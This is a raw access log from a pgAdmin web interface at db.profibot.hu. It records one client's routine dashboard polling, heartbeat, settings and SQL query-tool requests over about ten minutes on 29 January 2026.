+[29/Jan/2026:12:07:23 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:07:25 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:07:25 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:07:27 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:07:29 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:07:29 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:07:30 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:07:31 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:07:33 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:07:35 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:07:35 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:07:35 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:07:37 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:07:39 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:07:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:07:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:07:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:07:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:08:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:08:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:08:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:08:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:08:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:08:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:08:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:08:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:08:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:08:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:08:37 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:08:39 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:08:39 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:08:39 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:08:40 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:08:41 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:08:42 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:08:42 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 359] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:08:42 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:08:43 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:08:45 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:08:45 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:08:47 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:08:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:08:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:09:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:09:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:09:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:09:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:09:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:09:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:09:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:09:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:09:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:09:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:09:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:09:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:09:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:10:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:10:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:11:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:11:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:11:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:12:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:12:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:13:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:13:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:14:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:14:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:15:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:15:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:16:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:16:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 